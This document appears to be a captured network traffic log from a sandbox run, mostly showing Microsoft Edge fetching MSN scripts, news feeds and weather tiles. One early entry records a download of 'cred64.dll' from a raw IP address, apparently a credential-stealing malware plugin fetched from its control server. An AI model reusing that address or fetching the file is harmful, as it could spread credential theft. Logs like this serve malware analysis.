Date: Sat, 31 Dec 2022 00:05:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
-
Remote address:62.204.41.91:80RequestGET /8kcnjd3da3/Plugins/cred64.dll HTTP/1.1
Host: 62.204.41.91
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Connection: keep-alive
Last-Modified: Thu, 29 Dec 2022 19:45:51 GMT
ETag: "1f800-5f0fcbb7d75e4"
Accept-Ranges: bytes
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/otSDKStub.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/otSDKStub.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
ResponseHTTP/2.0 200
content-md5: Y7/+dPKCg0+OPHHgf5Uv/w==
last-modified: Fri, 23 Dec 2022 06:44:33 GMT
etag: 0x8DAE4B126CDEC4A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aa3081db-201e-0084-765a-1a42d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:46 GMT
content-length: 6445
akamai-request-bc: [a=88.221.24.111,b=431525132,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b88d0c
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otBannerSdk.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otBannerSdk.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
ResponseHTTP/2.0 200
content-md5: VrXpO/sHi57vK6QdtSHqmw==
last-modified: Fri, 23 Dec 2022 06:44:34 GMT
etag: 0x8DAE4B12782A89D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9b2a3a20-201e-004d-730e-189f17000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:47 GMT
content-length: 77526
akamai-request-bc: [a=88.221.24.111,b=431526360,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b891d8
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otTCF.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /staticsb/statics/latest/oneTrust/1.5/scripttemplates/6.25.0/otTCF.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
ResponseHTTP/2.0 200
content-md5: BgbbN2ce5WxxlchLAM7xjw==
last-modified: Thu, 29 Dec 2022 07:52:17 GMT
etag: 0x8DAE9719B9ECA8A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 42a61cd6-001e-0078-72a9-1b4bcf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:05:48 GMT
content-length: 14978
akamai-request-bc: [a=88.221.24.111,b=431528247,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b89937
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /statics/icons/favicon_newtabpage.png HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
ResponseHTTP/2.0 200
content-type: image/png
etag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
last-modified: Tue, 02 Mar 2021 18:25:29 GMT
server: AkamaiNetStorage
content-encoding: gzip
content-length: 373
unused62: 8096267
date: Sat, 31 Dec 2022 00:05:52 GMT
akamai-request-bc: [a=88.221.24.111,b=431534605,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8b20d
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
cache-control: public, max-age=31536000
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/service/news/feed/pages/ntp?User=m-0B196D17FEC56BBC00017F9CFFCD6AE0&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&caller=bgtask&cm=nl-nl&contentType=article,video,slideshow,webcontent&duotone=true&infopaneCount=17&memory=4&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&prerender=1&timeOut=2000msedge.exeRemote address:88.221.24.115:443RequestGET /service/news/feed/pages/ntp?User=m-0B196D17FEC56BBC00017F9CFFCD6AE0&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&apikey=0QfOX3Vn51YCzitbLaRkTTBadtWpgTN8NZLW0C1SEM&audienceMode=adult&caller=bgtask&cm=nl-nl&contentType=article,video,slideshow,webcontent&duotone=true&infopaneCount=17&memory=4&newsSkip=0&newsTop=48&ocid=anaheim-ntp-feeds&prerender=1&timeOut=2000 HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
ResponseHTTP/2.0 200
content-encoding: gzip
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
ddd-usertype: AnonymousMuid
ddd-tmpl: tmpl-l1-local:1;Static:1;XFeed;tmpl-l1-video:1;HasClientIpUserProfile:1;ULatLon52.31:4.94MGv1:1;CGShowTopstories:1;tmpl-l1-shopping:1;PageViewCount0;SageUserStatus:0_0_0_0;SportsMatch-18;PinnedHeadline:AA15Pqlv;MoneyInfo-14;RR:0;tmpl-esp-shopping:1;SageUser:0;WeatherSummary-4;ClientIpFallbackCohort:W_W;TileID:u179;cgtopStories-2;IMArticleNegUser:0;ULatLon52.31:4.94;ShoppingCard-9;IsRecoNewUser:1;MyFeed
x-wpo-activityid: 8D24952E-E369-4DE7-B30A-81BCEB74172B|2022-12-31T00:05:56Z|NEU1
ddd-feednewsitemcount: 35
ddd-activityid: 8d24952e-e369-4de7-b30a-81bceb74172b
ddd-debugid: 8d24952e-e369-4de7-b30a-81bceb74172b|2022-12-31T00:05:56.6018112Z|fabric:/ntpfeed|NEU1|NtpFeed_99
onewebservicelatency: 177
x-msedge-responseinfo: 177
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 91D3C27B0D3049F5B7868073A4F84E54 Ref B: AMS04EDGE2607 Ref C: 2022-12-31T00:05:56Z
expires: Sat, 31 Dec 2022 00:05:56 GMT
date: Sat, 31 Dec 2022 00:05:56 GMT
content-length: 45456
akamai-request-bc: [a=88.221.24.111,b=431540781,c=g,n=NL__AMSTERDAM,o=20940],[a=204.79.197.203,c=o]
server-timing: clientrtt; dur=33, clienttt; dur=205, origin; dur=203 , cdntime; dur=2
akamai-cache-status: Miss from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8ca2d
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
x-as-suppresssetcookie: 1
cache-control: private, max-age=0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212302356.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212302356.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
ResponseHTTP/2.0 200
content-md5: nrQc05jM6Avro0dwNsANCA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3B1D64C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 55ce0781-a01e-0108-54aa-1cc2f7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:04 GMT
content-length: 4930
akamai-request-bc: [a=88.221.24.111,b=431554196,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8fe94
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310020.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310020.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
ResponseHTTP/2.0 200
content-md5: sSn6QX2jN3fpt1eMp6EXyw==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C340124D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 718ef988-501e-002c-2eaa-1cca5a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:04 GMT
content-length: 3750
akamai-request-bc: [a=88.221.24.111,b=431554200,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8fe98
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310044.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310044.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
ResponseHTTP/2.0 200
content-md5: BQt4eWcqqf4TzEg9eEKBUA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C359FF1B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 536afc7c-201e-00fd-19aa-1ca8d0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:04 GMT
content-length: 3573
akamai-request-bc: [a=88.221.24.111,b=431554198,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b8fe96
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310108.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310108.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 7OS9DXVNfPvx1NWbKdNuHA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C35A7440
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 119235a7-401e-00c4-18aa-1c53cc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 4241
akamai-request-bc: [a=88.221.24.111,b=431554785,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=36, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b900e1
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310132.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_20_6_202212310132.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: uqKi5MinbgMyazdV9Qyc1w==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C33FEB3B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9e0a7a73-e01e-0016-44aa-1cd022000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 4171
akamai-request-bc: [a=88.221.24.111,b=431554790,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=36, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b900e6
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212302356.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212302356.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: FFx7nRTv9B/i2NHUX1g/jA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3B1FD5A
